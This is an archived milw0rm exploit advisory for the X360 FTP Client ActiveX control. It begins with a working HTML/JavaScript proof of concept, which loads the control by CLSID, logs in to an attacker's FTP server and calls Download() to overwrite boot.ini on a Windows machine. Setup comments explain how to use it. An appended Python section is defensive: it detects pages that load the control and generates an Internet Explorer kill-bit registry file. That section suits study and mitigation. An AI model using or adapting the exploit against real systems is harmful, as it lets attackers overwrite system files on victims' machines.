<HTML>

<!--

	- X360 FTP Client (X360FtpClient.ocx) Remote File Download/Overwrite -
	
		Author: t0pP8uZz
		Homepage: h4ck-y0u.org / milw0rm.com / Ciphercrew
		Description: ActiveX Remote Insecure Methods, Arbitrary File Overwrite Vulnerability.
		
		Report: Tested on Microsoft Windows XP Pro (SP2), Internet Explorer 6, fully patched
		
		ActiveX: http://www.x360soft.com/ftp-activex-ocx/x360-ftp-activex-ocx.html
	
		The Following Material Is For Educational Purposes Only - I will not be held responsible for any illegal actions.
	
		Internet Explorer can initialise this ActiveX control and take advantage of its functions.
		Included in this exploit (POC) is a piece of JavaScript code launching the ActiveX control and executing the "Download()" method; this allows system files to be overwritten.
		
		- X360FtpClient.ocx Information -
			
			Interface _DX360FtpClient : IDispatch
			
			Default Interface: True
			Members : 35
			
			XPassword
			XPortNo
			XServerName
			XUserName
			XLicenseKey
			XTransferType
			DeleteFolder
			CreateFolder
			GetFileName
			GetFileType
			GetFileSize
			SetRemoteFolder
			DeleteFile
			Download
			Upload
			RenameFile
			RenameFolder
			FindFile
			
		__EOF__
		
	Peace, t0pP8uZz

-->

<OBJECT ID="x360" CLASSID="CLSID:65DAE962-97DC-49EF-8591-CB5CFDEE3554">Could Not Load ActiveX Control.</OBJECT>
<script language="javascript">
/* - X360 FTP Client (X360FtpClient.ocx) Remote File Download/Overwrite - */
/*                                           Javascript Code By t0pP8uZz                                  */

// Description: the code below overwrites boot.ini on a Windows machine if the correct FTP details are given and a blank boot.ini is hosted remotely.

x360.XServerName   = "127.0.0.1"; // your ftp server
x360.XUserName     = "username";       // server username
x360.XPassword     = "password";     // server password
x360.XTransferType = 0;

remoteFile = "/public_html/boot.init"; // path to the remote file to download and place locally; the file name on the FTP server MUST be the same as that of the file you wish to overwrite locally.
localFile  = "C:/"; // directory in which to place the downloaded file; no file name, as the ActiveX control uses the remote file name.

if( (x360.Login() == 0) )
	x360.Download(remoteFile, localFile);
// else fail

</script>
</HTML>

# milw0rm.com [2008-05-09]
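
A defender-side check for the control described above, as an added example that is not part of the original advisory: it scans saved HTML for an OBJECT tag that loads this CLSID and for scripted calls to the control's file-handling methods, and builds the registry file that sets the Internet Explorer kill bit for it. The CLSID and method names come from the advisory; the function names and the sample page are constructed for illustration.

```python
import re
from html.parser import HTMLParser
# CLSID and method names come from the advisory above; all other names are illustrative.
X360_CLSID = "65DAE962-97DC-49EF-8591-CB5CFDEE3554"
FILE_METHODS = ("Download", "Upload", "DeleteFile", "DeleteFolder",
                "CreateFolder", "RenameFile", "RenameFolder")

class ControlFinder(HTMLParser):
    """Collect ids of <object> tags that load the control, plus inline script text."""
    def __init__(self):
        super().__init__()
        self.object_ids, self.scripts, self._in_script = [], [], False

    def handle_starttag(self, tag, attrs):
        self._in_script = tag == "script"
        if tag == "object":
            a = dict(attrs)
            clsid = (a.get("classid") or "").lower().replace("clsid:", "").strip("{} ")
            if clsid == X360_CLSID.lower():
                self.object_ids.append(a.get("id") or "")

    def handle_endtag(self, tag):
        self._in_script = False
    def handle_data(self, data):
        if self._in_script:
            self.scripts.append(data)

def scan(html):
    """Return (ids of matching objects, file-touching methods scripted on them)."""
    finder = ControlFinder()
    finder.feed(html)
    finder.close()
    code = "\n".join(finder.scripts)
    hits = set()
    for oid in filter(None, finder.object_ids):
        pat = r"\b%s\s*\.\s*(%s)\s*\(" % (re.escape(oid), "|".join(FILE_METHODS))
        hits.update(re.findall(pat, code))
    return finder.object_ids, sorted(hits)

def killbit_reg(clsid=X360_CLSID):
    """Build a .reg file that sets the IE kill bit (Compatibility Flags 0x400)."""
    key = (r"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer"
           r"\ActiveX Compatibility\{%s}" % clsid)
    return ("Windows Registry Editor Version 5.00\r\n\r\n[%s]\r\n"
            '"Compatibility Flags"=dword:00000400\r\n' % key)

# Constructed sample page; host-independent, file names are placeholders.
SAMPLE = ('<object id="ctl" classid="clsid:65dae962-97dc-49ef-8591-cb5cfdee3554"></object>'
          '<script>if (ctl.Login() == 0) ctl.Download("/pub/a.txt", "C:/tmp/");</script>')
```

`scan(SAMPLE)` returns the matching object id and the file-handling methods called on it; the output of `killbit_reg()` can be saved as a `.reg` file and imported on hosts where the control is installed.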